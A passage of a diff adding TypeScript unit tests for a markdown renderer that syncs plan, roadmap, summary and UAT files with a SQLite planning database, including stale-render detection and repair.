+
+// ═══════════════════════════════════════════════════════════════════════════
+// Plan Checkbox Round-Trip
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: renderPlanCheckboxes round-trip ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice', status: 'pending' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First task', status: 'done' });
+    insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Second task', status: 'done' });
+    insertTask({ id: 'T03', sliceId: 'S01', milestoneId: 'M001', title: 'Third task', status: 'pending' });
+
+    // Write plan with all tasks unchecked
+    const planContent = makePlanContent('S01', [
+      { id: 'T01', title: 'First task', done: false },
+      { id: 'T02', title: 'Second task', done: false },
+      { id: 'T03', title: 'Third task', done: false },
+    ]);
+    const planPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md');
+    fs.writeFileSync(planPath, planContent);
+    clearAllCaches();
+
+    const ok = await renderPlanCheckboxes(tmpDir, 'M001', 'S01');
+    assert.ok(ok, 'renderPlanCheckboxes returns true');
+
+    const rendered = fs.readFileSync(planPath, 'utf-8');
+    clearAllCaches();
+    const parsed = parsePlan(rendered);
+
+    assert.deepStrictEqual(parsed.tasks.length, 3, 'plan has 3 tasks after render');
+
+    const t01 = parsed.tasks.find(t => t.id === 'T01');
+    const t02 = parsed.tasks.find(t => t.id === 'T02');
+    const t03 = parsed.tasks.find(t => t.id === 'T03');
+    assert.ok(t01!.done, 'T01 checked (done in DB)');
+    assert.ok(t02!.done, 'T02 checked (done in DB)');
+    assert.ok(!t03!.done, 'T03 unchecked (pending in DB)');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+test('── markdown-renderer: renderPlanCheckboxes bidirectional ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice', status: 'pending' });
+    // T01 pending in DB but checked on disk
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First task', status: 'pending' });
+    insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Second task', status: 'done' });
+
+    const planContent = makePlanContent('S01', [
+      { id: 'T01', title: 'First task', done: true },   // checked but DB says pending
+      { id: 'T02', title: 'Second task', done: false },  // unchecked but DB says done
+    ]);
+    const planPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md');
+    fs.writeFileSync(planPath, planContent);
+    clearAllCaches();
+
+    const ok = await renderPlanCheckboxes(tmpDir, 'M001', 'S01');
+    assert.ok(ok, 'bidirectional plan render returns true');
+
+    const rendered = fs.readFileSync(planPath, 'utf-8');
+    clearAllCaches();
+    const parsed = parsePlan(rendered);
+
+    const t01 = parsed.tasks.find(t => t.id === 'T01');
+    const t02 = parsed.tasks.find(t => t.id === 'T02');
+    assert.ok(!t01!.done, 'T01 unchecked (DB says pending, was checked)');
+    assert.ok(t02!.done, 'T02 checked (DB says done, was unchecked)');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+test('── markdown-renderer: renderPlanFromDb creates parse-compatible slice plan + task plan files ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S02']);
+
+    insertMilestone({ id: 'M001', title: 'Milestone', status: 'active' });
+    insertSlice({
+      id: 'S02',
+      milestoneId: 'M001',
+      title: 'DB-backed planning',
+      status: 'pending',
+      demo: 'Rendered plans exist on disk.',
+      planning: {
+        goal: 'Render slice plans from DB state.',
+        successCriteria: '- Slice plan stays parse-compatible\n- Task plan files are regenerated',
+        proofLevel: 'integration',
+        integrationClosure: 'Wires DB planning rows to markdown artifacts.',
+        observabilityImpact: '- Run renderer contract tests\n- Inspect stale-render diagnostics on mismatch',
+      },
+    });
+    insertTask({
+      id: 'T01',
+      sliceId: 'S02',
+      milestoneId: 'M001',
+      title: 'Render slice plan',
+      status: 'pending',
+      planning: {
+        description: 'Implement the DB-backed slice plan renderer.',
+        estimate: '45m',
+        files: ['src/resources/extensions/gsd/markdown-renderer.ts'],
+        verify: 'node --test markdown-renderer.test.ts',
+        inputs: ['src/resources/extensions/gsd/markdown-renderer.ts'],
+        expectedOutput: ['src/resources/extensions/gsd/tests/markdown-renderer.test.ts'],
+        observabilityImpact: 'Renderer tests cover stale render failure paths.',
+      },
+    });
+    insertTask({
+      id: 'T02',
+      sliceId: 'S02',
+      milestoneId: 'M001',
+      title: 'Render task plan',
+      status: 'pending',
+      planning: {
+        description: 'Emit the task plan file with conservative frontmatter.',
+        estimate: '30m',
+        files: ['src/resources/extensions/gsd/files.ts'],
+        verify: 'node --test auto-recovery.test.ts',
+        inputs: ['src/resources/extensions/gsd/files.ts'],
+        expectedOutput: ['src/resources/extensions/gsd/tests/auto-recovery.test.ts'],
+        observabilityImpact: 'Missing task-plan files fail recovery verification.',
+      },
+    });
+
+    const rendered = await renderPlanFromDb(tmpDir, 'M001', 'S02');
+    assert.ok(fs.existsSync(rendered.planPath), 'slice plan written to disk');
+    assert.strictEqual(rendered.taskPlanPaths.length, 2, 'task plan paths returned for each task');
+    assert.ok(rendered.taskPlanPaths.every((p) => fs.existsSync(p)), 'all task plan files written to disk');
+
+    const planContent = fs.readFileSync(rendered.planPath, 'utf-8');
+    clearAllCaches();
+    const parsedPlan = parsePlan(planContent);
+    assert.strictEqual(parsedPlan.id, 'S02', 'rendered slice plan parses with correct slice id');
+    assert.strictEqual(parsedPlan.goal, 'Render slice plans from DB state.', 'rendered slice plan preserves goal');
+    assert.strictEqual(parsedPlan.demo, 'Rendered plans exist on disk.', 'rendered slice plan preserves demo');
+    assert.strictEqual(parsedPlan.mustHaves.length, 2, 'rendered slice plan exposes must-haves');
+    assert.strictEqual(parsedPlan.tasks.length, 2, 'rendered slice plan exposes all tasks');
+    assert.strictEqual(parsedPlan.tasks[0].id, 'T01', 'first task parses correctly');
+    assert.ok(parsedPlan.tasks[0].description.includes('DB-backed slice plan renderer'), 'task description preserved in slice plan');
+    assert.strictEqual(parsedPlan.tasks[0].files?.[0], 'src/resources/extensions/gsd/markdown-renderer.ts', 'files list preserved in slice plan');
+    assert.strictEqual(parsedPlan.tasks[0].verify, 'node --test markdown-renderer.test.ts', 'verify line preserved in slice plan');
+
+    const planArtifact = getArtifact('milestones/M001/slices/S02/S02-PLAN.md');
+    assert.ok(planArtifact !== null, 'slice plan artifact stored in DB');
+    assert.ok(planArtifact!.full_content.includes('## Tasks'), 'stored plan artifact contains task section');
+
+    const taskPlanPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'tasks', 'T01-PLAN.md');
+    const taskPlanContent = fs.readFileSync(taskPlanPath, 'utf-8');
+    const taskPlanFile = parseTaskPlanFile(taskPlanContent);
+    assert.strictEqual(taskPlanFile.frontmatter.estimated_steps, 1, 'task plan frontmatter exposes estimated_steps');
+    assert.strictEqual(taskPlanFile.frontmatter.estimated_files, 1, 'task plan frontmatter exposes estimated_files');
+    assert.strictEqual(taskPlanFile.frontmatter.skills_used.length, 0, 'task plan frontmatter uses conservative empty skills list');
+    assert.match(taskPlanContent, /^# T01: Render slice plan/m, 'task plan renders task heading');
+    assert.match(taskPlanContent, /^## Inputs$/m, 'task plan renders Inputs section');
+    assert.match(taskPlanContent, /^## Expected Output$/m, 'task plan renders Expected Output section');
+    assert.match(taskPlanContent, /^## Verification$/m, 'task plan renders Verification section');
+
+    const taskArtifact = getArtifact('milestones/M001/slices/S02/tasks/T01-PLAN.md');
+    assert.ok(taskArtifact !== null, 'task plan artifact stored in DB');
+    assert.ok(taskArtifact!.full_content.includes('skills_used: []'), 'stored task plan artifact preserves conservative skills_used');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+test('── markdown-renderer: renderTaskPlanFromDb throws for missing task ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S02']);
+    insertMilestone({ id: 'M001', title: 'Milestone', status: 'active' });
+    insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Slice', status: 'pending' });
+
+    let threw = false;
+    try {
+      await renderTaskPlanFromDb(tmpDir, 'M001', 'S02', 'T99');
+    } catch (error) {
+      threw = true;
+      assert.match(String((error as Error).message), /task M001\/S02\/T99 not found/, 'renderTaskPlanFromDb should fail clearly when task row is missing');
+    }
+    assert.ok(threw, 'renderTaskPlanFromDb throws when the task row is missing');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Task Summary Rendering
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: renderTaskSummary round-trip ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice', status: 'pending' });
+
+    const summaryContent = makeTaskSummaryContent('T01');
+    insertTask({
+      id: 'T01',
+      sliceId: 'S01',
+      milestoneId: 'M001',
+      title: 'Test Task',
+      status: 'done',
+      fullSummaryMd: summaryContent,
+    });
+
+    const ok = await renderTaskSummary(tmpDir, 'M001', 'S01', 'T01');
+    assert.ok(ok, 'renderTaskSummary returns true');
+
+    // Verify file exists on disk
+    const summaryPath = path.join(
+      tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'tasks', 'T01-SUMMARY.md',
+    );
+    assert.ok(fs.existsSync(summaryPath), 'T01-SUMMARY.md written to disk');
+
+    // Parse and verify
+    const rendered = fs.readFileSync(summaryPath, 'utf-8');
+    clearAllCaches();
+    const parsed = parseSummary(rendered);
+    assert.deepStrictEqual(parsed.frontmatter.id, 'T01', 'parsed summary has correct id');
+    assert.deepStrictEqual(parsed.frontmatter.parent, 'S01', 'parsed summary has correct parent');
+    assert.deepStrictEqual(parsed.frontmatter.milestone, 'M001', 'parsed summary has correct milestone');
+    assert.deepStrictEqual(parsed.frontmatter.duration, '45m', 'parsed summary has correct duration');
+    assert.ok(parsed.title.includes('T01'), 'parsed summary title contains task ID');
+    assert.ok(parsed.whatHappened.includes('Built the test feature'), 'whatHappened content preserved');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+test('── markdown-renderer: renderTaskSummary skips empty ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice', status: 'pending' });
+    insertTask({
+      id: 'T01',
+      sliceId: 'S01',
+      milestoneId: 'M001',
+      title: 'Task without summary',
+      status: 'pending',
+      fullSummaryMd: '', // empty summary
+    });
+
+    const ok = await renderTaskSummary(tmpDir, 'M001', 'S01', 'T01');
+    assert.ok(!ok, 'renderTaskSummary returns false for empty summary');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Slice Summary Rendering
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: renderSliceSummary round-trip ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice', status: 'complete' });
+
+    // Update slice with summary and UAT content
+    // Since insertSlice uses INSERT OR IGNORE, we need to set the content via raw adapter
+    const db = await import('../gsd-db.ts');
+    const adapter = db._getAdapter()!;
+    adapter.prepare(
+      `UPDATE slices SET full_summary_md = :sm, full_uat_md = :um WHERE milestone_id = 'M001' AND id = 'S01'`,
+    ).run({
+      ':sm': '---\nid: S01\nparent: M001\nmilestone: M001\nduration: 2h\nverification_result: all-pass\ncompleted_at: 2025-01-01\nblocker_discovered: false\nprovides: []\nrequires: []\naffects: []\nkey_files:\n  - src/index.ts\nkey_decisions: []\npatterns_established: []\ndrill_down_paths: []\nobservability_surfaces: []\n---\n\n# S01: Test Slice Summary\n\n**Completed core functionality**\n\n## What Happened\n\nBuilt the slice.\n\n## Deviations\n\nNone.\n',
+      ':um': '# S01 UAT\n\n## UAT Type\n\n- UAT mode: artifact-driven\n\n## Checks\n\n- All tests pass\n',
+    });
+
+    const ok = await renderSliceSummary(tmpDir, 'M001', 'S01');
+    assert.ok(ok, 'renderSliceSummary returns true');
+
+    // Verify SUMMARY file
+    const summaryPath = path.join(
+      tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-SUMMARY.md',
+    );
+    assert.ok(fs.existsSync(summaryPath), 'S01-SUMMARY.md written to disk');
+
+    const summaryContent = fs.readFileSync(summaryPath, 'utf-8');
+    assert.ok(summaryContent.includes('Test Slice Summary'), 'summary content correct');
+
+    // Verify UAT file
+    const uatPath = path.join(
+      tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-UAT.md',
+    );
+    assert.ok(fs.existsSync(uatPath), 'S01-UAT.md written to disk');
+
+    const uatContent = fs.readFileSync(uatPath, 'utf-8');
+    assert.ok(uatContent.includes('artifact-driven'), 'UAT content correct');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// renderAllFromDb
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: renderAllFromDb produces all files ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    // Setup: 2 milestones, M001 has 2 slices with tasks, M002 has 1 slice
+    scaffoldDirs(tmpDir, 'M001', ['S01', 'S02']);
+    scaffoldDirs(tmpDir, 'M002', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'First', status: 'active' });
+    insertMilestone({ id: 'M002', title: 'Second', status: 'active' });
+
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Core', status: 'complete' });
+    insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Render', status: 'pending' });
+    insertSlice({ id: 'S01', milestoneId: 'M002', title: 'Future', status: 'pending' });
+
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'DB', status: 'done', fullSummaryMd: makeTaskSummaryContent('T01') });
+    insertTask({ id: 'T01', sliceId: 'S02', milestoneId: 'M001', title: 'Renderer', status: 'pending' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M002', title: 'Future task', status: 'pending' });
+
+    // Write roadmap and plan files on disk
+    const roadmap1 = makeRoadmapContent([
+      { id: 'S01', title: 'Core', done: false },
+      { id: 'S02', title: 'Render', done: false },
+    ]);
+    fs.writeFileSync(
+      path.join(tmpDir, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md'),
+      roadmap1,
+    );
+
+    const roadmap2 = makeRoadmapContent([
+      { id: 'S01', title: 'Future', done: false },
+    ]);
+    fs.writeFileSync(
+      path.join(tmpDir, '.gsd', 'milestones', 'M002', 'M002-ROADMAP.md'),
+      roadmap2,
+    );
+
+    const plan1 = makePlanContent('S01', [
+      { id: 'T01', title: 'DB', done: false },
+    ]);
+    fs.writeFileSync(
+      path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md'),
+      plan1,
+    );
+
+    const plan2 = makePlanContent('S02', [
+      { id: 'T01', title: 'Renderer', done: false },
+    ]);
+    fs.writeFileSync(
+      path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S02', 'S02-PLAN.md'),
+      plan2,
+    );
+
+    const plan3 = makePlanContent('S01', [
+      { id: 'T01', title: 'Future task', done: false },
+    ]);
+    fs.writeFileSync(
+      path.join(tmpDir, '.gsd', 'milestones', 'M002', 'slices', 'S01', 'S01-PLAN.md'),
+      plan3,
+    );
+
+    clearAllCaches();
+
+    const result = await renderAllFromDb(tmpDir);
+
+    assert.ok(result.rendered > 0, 'renderAllFromDb rendered some files');
+    assert.deepStrictEqual(result.errors.length, 0, 'renderAllFromDb had no errors');
+
+    // Verify M001 roadmap has S01 checked
+    const m1Roadmap = fs.readFileSync(
+      path.join(tmpDir, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md'), 'utf-8',
+    );
+    clearAllCaches();
+    const parsed1 = parseRoadmap(m1Roadmap);
+    const s01 = parsed1.slices.find(s => s.id === 'S01');
+    assert.ok(s01!.done, 'M001 S01 checked after renderAll');
+
+    // Verify M001/S01 plan has T01 checked
+    const m1s1Plan = fs.readFileSync(
+      path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md'), 'utf-8',
+    );
+    clearAllCaches();
+    const parsedPlan = parsePlan(m1s1Plan);
+    assert.ok(parsedPlan.tasks[0].done, 'M001/S01 T01 checked after renderAll');
+
+    // Verify task summary written
+    const taskSummaryPath = path.join(
+      tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'tasks', 'T01-SUMMARY.md',
+    );
+    assert.ok(fs.existsSync(taskSummaryPath), 'T01 summary written by renderAll');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Graceful Degradation (Disk Fallback)
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: graceful fallback reads from disk when artifact not in DB ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Core', status: 'complete' });
+
+    // Write roadmap to disk but NOT in artifacts DB
+    const roadmapContent = makeRoadmapContent([
+      { id: 'S01', title: 'Core', done: false },
+    ]);
+    const roadmapPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md');
+    fs.writeFileSync(roadmapPath, roadmapContent);
+    clearAllCaches();
+
+    // Verify no artifact in DB
+    const before = getArtifact('milestones/M001/M001-ROADMAP.md');
+    assert.deepStrictEqual(before, null, 'artifact not in DB before render');
+
+    // Render — should read from disk, store in DB
+    const ok = await renderRoadmapCheckboxes(tmpDir, 'M001');
+    assert.ok(ok, 'render succeeds with disk fallback');
+
+    // Verify artifact now in DB (stored after reading from disk)
+    const after = getArtifact('milestones/M001/M001-ROADMAP.md');
+    assert.ok(after !== null, 'artifact stored in DB after disk fallback render');
+    assert.ok(after!.full_content.includes('[x] **S01:'), 'DB artifact reflects rendered state');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// stderr warnings (graceful degradation diagnostics)
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: stderr warning on missing content ──', async () => {
+  openDatabase(':memory:');
+
+  // No milestone/slices in DB, no files on disk — should return false and emit stderr
+  insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+  // No slices inserted — should warn about no slices
+
+  const ok = await renderRoadmapCheckboxes('/nonexistent/path', 'M001');
+  assert.ok(!ok, 'returns false when no slices in DB');
+
+  closeDatabase();
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Stale Detection — Plan Checkbox Mismatch
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: detectStaleRenders finds plan checkbox mismatch ──', () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice', status: 'pending' });
+
+    // T01 is done, T02 is also done in DB
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First task', status: 'done' });
+    insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Second task', status: 'done' });
+
+    // Write plan with T01 checked but T02 unchecked
+    // T01 matches DB (done + checked) but T02 is stale (done but unchecked)
+    const planContent = makePlanContent('S01', [
+      { id: 'T01', title: 'First task', done: true },
+      { id: 'T02', title: 'Second task', done: false },
+    ]);
+    const planPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md');
+    fs.writeFileSync(planPath, planContent);
+    clearAllCaches();
+
+    // Render T01 to sync it, but leave T02 out of sync
+    // Actually, the plan was written with T01 already checked. 
+    // The stale detection should find T02 as stale.
+    const stale = detectStaleRenders(tmpDir);
+
+    assert.ok(stale.length > 0, 'detectStaleRenders should find stale entries');
+    const t02Stale = stale.find(s => s.reason.includes('T02'));
+    assert.ok(!!t02Stale, 'should detect T02 as stale (done in DB, unchecked in plan)');
+    assert.ok(t02Stale!.reason.includes('done in DB but unchecked'), 'reason should explain the mismatch');
+
+    // T01 should NOT be stale — it's checked and done
+    const t01Stale = stale.find(s => s.reason.includes('T01'));
+    assert.deepStrictEqual(t01Stale, undefined, 'T01 should not be stale (done and checked)');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Stale Repair — Plan Checkbox
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: repairStaleRenders fixes plan and second detect returns empty ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice', status: 'pending' });
+
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First task', status: 'done' });
+    insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Second task', status: 'done' });
+
+    // Write plan with both tasks unchecked (both are stale since DB says done)
+    const planContent = makePlanContent('S01', [
+      { id: 'T01', title: 'First task', done: false },
+      { id: 'T02', title: 'Second task', done: false },
+    ]);
+    const planPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md');
+    fs.writeFileSync(planPath, planContent);
+    clearAllCaches();
+
+    // Verify stale before repair
+    const staleBefore = detectStaleRenders(tmpDir);
+    assert.ok(staleBefore.length > 0, 'should have stale entries before repair');
+
+    // Repair
+    const repaired = await repairStaleRenders(tmpDir);
+    assert.ok(repaired > 0, 'repairStaleRenders should repair at least 1 file');
+
+    // After repair, detect again — should be empty
+    clearAllCaches();
+    const staleAfter = detectStaleRenders(tmpDir);
+    assert.deepStrictEqual(staleAfter.length, 0, 'detectStaleRenders should return empty after repair');
+
+    // Verify the plan file was actually updated
+    const repairedContent = fs.readFileSync(planPath, 'utf-8');
+    assert.ok(repairedContent.includes('[x] **T01:'), 'T01 should be checked after repair');
+    assert.ok(repairedContent.includes('[x] **T02:'), 'T02 should be checked after repair');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Stale Detection — Roadmap Checkbox Mismatch
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: detectStaleRenders finds roadmap checkbox mismatch ──', () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01', 'S02']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Core', status: 'complete' });
+    insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Render', status: 'pending' });
+
+    // Write roadmap with both slices unchecked (S01 is stale — complete in DB but unchecked)
+    const roadmapContent = makeRoadmapContent([
+      { id: 'S01', title: 'Core', done: false },
+      { id: 'S02', title: 'Render', done: false },
+    ]);
+    const roadmapPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'M001-ROADMAP.md');
+    fs.writeFileSync(roadmapPath, roadmapContent);
+    clearAllCaches();
+
+    const stale = detectStaleRenders(tmpDir);
+    const s01Stale = stale.find(s => s.reason.includes('S01'));
+    assert.ok(!!s01Stale, 'should detect S01 as stale (complete in DB, unchecked in roadmap)');
+
+    const s02Stale = stale.find(s => s.reason.includes('S02'));
+    assert.deepStrictEqual(s02Stale, undefined, 'S02 should not be stale (pending and unchecked — matches)');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Stale Detection — Missing Task Summary
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: detectStaleRenders finds missing task summary ──', () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice', status: 'pending' });
+
+    // Task is done with full_summary_md, but no SUMMARY.md on disk
+    const summaryContent = makeTaskSummaryContent('T01');
+    insertTask({
+      id: 'T01',
+      sliceId: 'S01',
+      milestoneId: 'M001',
+      title: 'Task',
+      status: 'done',
+      fullSummaryMd: summaryContent,
+    });
+
+    // Also write a plan so plan detection doesn't trigger (T01 is done but not checked)
+    // We need a plan file so task plan detection works — but we specifically want to test
+    // the missing summary case, so write plan with T01 checked
+    const planContent = makePlanContent('S01', [
+      { id: 'T01', title: 'Task', done: true },
+    ]);
+    const planPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md');
+    fs.writeFileSync(planPath, planContent);
+    clearAllCaches();
+
+    const stale = detectStaleRenders(tmpDir);
+    const summaryStale = stale.find(s => s.reason.includes('SUMMARY.md missing'));
+    assert.ok(!!summaryStale, 'should detect missing T01-SUMMARY.md');
+    assert.ok(summaryStale!.reason.includes('T01'), 'reason should mention T01');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Stale Repair — Missing Task Summary
+// ═══════════════════════════════════════════════════════════════════════════
+
+test('── markdown-renderer: repairStaleRenders writes missing task summary ──', async () => {
+  const tmpDir = makeTmpDir();
+  const dbPath = path.join(tmpDir, '.gsd', 'gsd.db');
+  openDatabase(dbPath);
+  clearAllCaches();
+
+  try {
+    scaffoldDirs(tmpDir, 'M001', ['S01']);
+
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice', status: 'pending' });
+
+    const summaryContent = makeTaskSummaryContent('T01');
+    insertTask({
+      id: 'T01',
+      sliceId: 'S01',
+      milestoneId: 'M001',
+      title: 'Task',
+      status: 'done',
+      fullSummaryMd: summaryContent,
+    });
+
+    // Write plan with T01 checked so plan detection doesn't trigger
+    const planContent = makePlanContent('S01', [
+      { id: 'T01', title: 'Task', done: true },
+    ]);
+    const planPath = path.join(tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'S01-PLAN.md');
+    fs.writeFileSync(planPath, planContent);
+    clearAllCaches();
+
+    // Repair
+    const repaired = await repairStaleRenders(tmpDir);
+    assert.ok(repaired > 0, 'should repair missing summary');
+
+    // Verify file written
+    const summaryPath = path.join(
+      tmpDir, '.gsd', 'milestones', 'M001', 'slices', 'S01', 'tasks', 'T01-SUMMARY.md',
+    );
+    assert.ok(fs.existsSync(summaryPath), 'T01-SUMMARY.md should exist after repair');
+
+    // Second detect should be empty
+    clearAllCaches();
+    const staleAfter = detectStaleRenders(tmpDir);
+    const summaryStale = staleAfter.find(s => s.reason.includes('SUMMARY.md missing') && s.reason.includes('T01'));
+    assert.deepStrictEqual(summaryStale, undefined, 'missing summary should be fixed after repair');
+  } finally {
+    closeDatabase();
+    cleanupDir(tmpDir);
+  }
